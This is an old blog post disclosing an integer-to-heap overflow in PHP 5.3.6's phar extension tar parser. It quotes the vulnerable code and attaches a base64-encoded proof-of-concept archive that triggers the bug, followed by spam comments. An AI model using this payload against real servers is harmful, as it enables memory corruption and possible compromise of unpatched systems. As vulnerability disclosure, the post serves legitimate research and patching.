Thursday, April 21, 2011

PHP (phar extension) heap overflow

version PHP:  5.3.6
version phar ext.: 1.1.1
site: http://php.net/
source code: http://windows.php.net/downloads/releases/php-5.3.6-src.zip

An integer overflow vulnerability leading to a heap overflow in the file ..\php-5.3.6\ext\phar\tar.c.


int phar_parse_tarfile(php_stream* fp, char *fname, int fname_len, char *alias, int alias_len, phar_archive_data** pphar, int is_data, php_uint32 compression, char **error TSRMLS_DC) /* {{{ */
{
//.....
size = entry.uncompressed_filesize = entry.compressed_filesize =
phar_tar_number(hdr->size, sizeof(hdr->size)); //(*)
//.....
if (!last_was_longlink && hdr->typeflag == 'L') {
last_was_longlink = 1;
/* support the ././@LongLink system for storing long filenames */
entry.filename_len = entry.uncompressed_filesize;
entry.filename = pemalloc(entry.filename_len+1, myphar->is_persistent); //(**)

read = php_stream_read(fp, entry.filename, entry.filename_len); //(***)
//.....

If entry.filename_len(which attacker can control) equal 0xffffffff, pemalloc() will allocate zero length buffer. Then php_stream_read() get as a length parameter 0xffffffff value. Because php_stream_read () checks that the passed length does not exceed the amount of data available, the buffer overflow sizes are available from the data stream.

POC code (MIME encoded):
php_phar.zip begin

UEsDBBQAAAAIAA96ez4k50+6aQAAAG0AAAAIAAAAcGhhci5waHAVi0sKgzAQ
QPeeYhoKTjbpAfpx1ULBhTcYghlxUJMhCnp8ze7xeO/V6KggA+CNj43jKinS
nHzggEZHn421EITRrJOosc+quhcNb4i8Q3chBsnRL4xEv3/7JbLgoH5o6l0p
3eZzXb7mcwJQSwMEFAAAAAgAMbB7PrO7HsFRAAAAmxAAAAwAAABwb2MucGhh
ci50YXLtzTsKgDAQRdFZiisQM9HJJtxEQEEbCX7A5RsrC2u18J7y8eCOU9fv
ZRqSPKfKzOy2h4s4V2ndmFevct590KKVF2zLGueclH+KAAAAAAB86wBQSwEC
FAAUAAAACAAPens+JOdPumkAAABtAAAACAAAAAAAAAAAACAAAAAAAAAAcGhh
ci5waHBQSwECFAAUAAAACAAxsHs+s7sewVEAAACbEAAADAAAAAAAAAAAACAA
AACPAAAAcG9jLnBoYXIudGFyUEsFBgAAAAACAAIAcAAAAAoBAAAAAA==

end

7 comments:

  1. "Nice blog.. Thanks for sharing this blog information with us…

    Web Development Company Chennai"

    ReplyDelete
  2. I believe Web time sheet software makes the complete employee time clock tracking task easier. Its easy to update, approve and maintain the time sheets in no time.Time Attendance System

    ReplyDelete
  3. I agree with you. This post is truly inspiring. I like your post and everything you share with us is current and very informative, I want to bookmark the page so I can return here from you that you have done a fantastic job
    Web developer

    ReplyDelete
  4. Hi,

    Blog Programming favorite tutorial and websites of the internet on your browser. My site is learning many tutorial & online earning. so my site share you friends If you want to earn money to sit on your home, you can follow my site http://freelancetube.blogspot.com/

    I have listed there a lot of Photoshop and Illustrator tutorials, Earning Tutorials, etc. There will not any hamper for you to visit my site rather you will be benefited.

    http://freelancetube.blogspot.com/

    ReplyDelete
  5. This blog is really informative i really had fun reading it.

    php

    ReplyDelete
  6. Hi,
    Hey. Good to know that it was helpful. Makes me feel better about putting the time in to write it up. :)

    As you go through the process, definitely add comments if your experience varies from mine, so that the next person can benefit.

    Time Attendance System In Chennai

    ReplyDelete